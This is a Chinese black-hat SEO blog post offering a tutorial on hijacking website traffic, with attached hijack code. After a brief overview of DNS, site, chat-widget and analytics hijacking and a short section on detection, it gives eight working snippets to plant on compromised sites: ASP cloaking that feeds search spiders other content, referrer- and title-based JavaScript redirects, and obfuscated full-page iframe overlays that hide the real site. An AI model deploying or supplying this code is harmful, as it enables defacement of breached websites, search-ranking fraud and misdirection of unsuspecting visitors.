福州seo培训:网站域名劫持流量教程附劫持代码

作者: 黑帽SEO少校 分类: 渗透劫持,黑帽seo教程 发布时间: 2019-01-27 18:05:32

一、黑帽网站劫持分类

1:域名dns劫持

dns劫持是通过全国各地的dns运营商,如果你搞定了机房管理员,就可以任意跳转或者分时段、分关键词、指定网址跳倒你想要的网址。当然各省、市的dns运营商不同,如果有人说可以劫持全省dns流量,还是有可信度的。如果他要说全国dns劫持,100%是骗子!没有任何一个人可以搞定全国所有地区的几十个运营商,本身就是一个违规的操作,需要私下谈妥。难道全国所有省的机房管理员都愿意陪着你玩心跳?

2:网站劫持

网站劫持一般都是通过网站程序漏洞或者服务器系统漏洞从而拿到网站或者服务器权限,然后再网站添加JS跳转代码从而实现网站劫持。网站劫持代码等下在下方分享出来。

3:客服系统劫持

客服系统有很多网站都会添加第三方的客服代码,然后某些第三方客服系统的内部人员内外勾结,提供把客户的咨询加载给别人的服务。当然不能排除第三方客服系统的网站被入侵的可能性。

4:网站统计代码劫持

网站的统计代码跟第三方客服一样都是需要在自己网站上添加一个外部域名代码的,原理也跟客服劫持一样。曾经cnzz被收购之前就被爆出有通过统计代码劫持别人网站流量的丑闻。

二、网站劫持的应对策略和解决办法

为了避免网站劫持,建议网站都要做https加密。如果网站被劫持,先判断出是哪类劫持,然后针对性的去处理修复。

1:ping检测全国测试

如果发现网站某个省的解析IP跟其他省的不一致,证明网站被该地区的dns运营商劫持。

2:检查网站代码是否被劫持

先从被跳转的页面检查代码,一般都是首页居多,网站是否加载了可疑的JS,挨个打开js查看js内容。下一步查看是否有被转码隐藏的内容,利用站长网的转码工具反向解析出来内容,如果是可疑代码直接清除。

3:检查第三方统计代码和客服代码

检查第三方外部域名的代码内容是否有异常,如果有任何可疑的地方直接清除。或者可以暂时性的取消代码测试是否恢复。如果恢复可以确认为第三方的问题。

4:检查网页快照

查看网站源码和搜索引擎快照是否一致,可以从快照里面查找到加载的跳转代码。

5:检查服务器

如果检查网站和快照一切正常,那就是在服务器端直接判断跳转了,利用杀毒软件查杀网站目录下的可疑文件,检查iis、apache、nginx配置文件以及服务器配置设置。

三、常用网站劫持跳转代码

1:网站快照劫持代码

<%@ LANGUAGE = VBScript.Encode %><% 
Dim agent
agent=Request.ServerVariables("http_user_agent")
If instr(agent,"Baiduspider") > 0 or instr(agent,"baidubrowser") > 0 or instr(agent,"Sogou") > 0 or instr(agent,"googlebot") > 0 or instr(agent,"Sosospider") > 0 then
linkurl="http://这里填网址" *快照网址
Function GetBody(Url) 
Dim objXML
On Error Resume Next
Set objXML = CreateObject("Microsoft.XMLHTTP") 
With objXML 
.Open "Get", Url, False, "", "" 
.Send 
GetBody = .ResponseBody
End With 
GetBody=BytesToBstr(GetBody,"GB2312")
Set objXML = Nothing 
End Function
Function BytesToBstr(strBody,CodeBase)
dim objStream
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write strBody
objStream.Position = 0
objStream.Type = 2
objStream.Charset = CodeBase
BytesToBstr = objStream.ReadText 
objStream.Close
set objStream = nothing
End Function
response.write GetBody(linkurl)
End if%>
<script LANGUAGE="Javascript">
var s=document.referrer
if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 ) 
location.href="这里填跳转地址";
</script>

2:上方显示广告,下方显示原站内容

document.writeln("<iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='7350' allowTransparency src=http://这里填网址></iframe>");

3:全屏覆盖只能看到广告

var  ss = '<center id="showcloneshengxiaon"><ifr'+'ame scrolling="no" marginheight=0 marginwidth=0  frameborder="0" width="100%" width="14'+'00" height="50'+'50" src="http://这里填网址"></iframe></center>';
eval("do"+"cu"+"ment.wr"+"ite('"+ss+"');");
	
try{
	setInterval(function(){

		try{
			document.getElementById("div"+"All").style.display="no"+"ne";
		}catch(e){}

		for(var i=0;i<document.body.children.length;i++){
			try{
				var tagname = document.body.children[i].tagName;
				var myid = document.body.children[i].id;
				if(myid!="iconDiv1" && myid!="showcloneshengxiaon"){
				  // if(tagname!="center"){ 
				     document.body.children[i].style.display="non"+"e";
				   //}
				}
			}catch(e){}
		}

	},100);
}catch(e){}

4:搜索引擎来路直接跳JS代码

document.writeln("<script LANGUAGE=\"Javascript\">");
document.writeln("var s=document.referrer");
document.writeln("if(s.indexOf(\"baidu\")>0 || s.indexOf(\"sogou\")>0 || s.indexOf(\"soso\")>0 ||s.indexOf(\"sm\")>0 ||s.indexOf(\"uc\")>0 ||s.indexOf(\"bing\")>0 ||s.indexOf(\"yahoo\")>0 ||s.indexOf(\"so\")>0 )");
document.writeln("location.href=\"这里填网址\";");
document.writeln("</script>");

5:根据不同关键词跳转不同的网址代码

var title = window["document"]["title"];
title = decodeURI(title);
if(title.indexOf("\u9ed1\u5e3d") > -1){
	jumpto("https://www.0116.net/");  //根据上方的Unicode转码关键词黑帽跳转到这个网址
} else if(title.indexOf("转码关键词") > -1){
	jumpto("http://这里填网址");
} else if(title.indexOf("转码关键词") > -1){
	jumpto("http://这里填网址");
} else if(title.indexOf("转码关键词") > -1){
	jumpto("http://这里填网址");
} else {
	jumpto("http://这里填无关键词跳转网址");
}

6:打开网站标题正常,快照标题异常

<title>转码后的标题,用于劫持快照</title>
<script>document.title='网站打开后浏览器显示的标题';</script>
再添加一个判断搜索引擎跳转的JS配合使用

7:打开直接跳,不跳蜘蛛

function jumurl(){
 window.location.href = 'http://这里填网址'
}
setTimeout(jumurl,2000);
jumurl();

8:双跳,打开跳两次

ar d=document.referrer;
if (d.indexOf("link?url")>0 || d.indexOf("%A8%B1")>0 || d.indexOf("%9F%8E")>0){
self.location="http://这里填网址"; opener.location.href='http://这里是双跳网址'; }

总结:任何东西都是死的,要做到活学活用,有个朋友把两个东西结合起来用,效果非常好。他的手法是利用首页快照劫持,判断如果是蜘蛛,返回寄生虫页面,生成/index.php?随机 /的伪首页文件,利用首页权重批量劫持排名。如果直接打开首页又是正常返回网站内容的。所以任何东西都需要自己的思路去创新,才能第一个吃螃蟹。

本文由黑帽seo原创发布,转载请注明出处: https://www.0116.net/hmseojc/76/

发表评论

电子邮件地址不会被公开。

更多阅读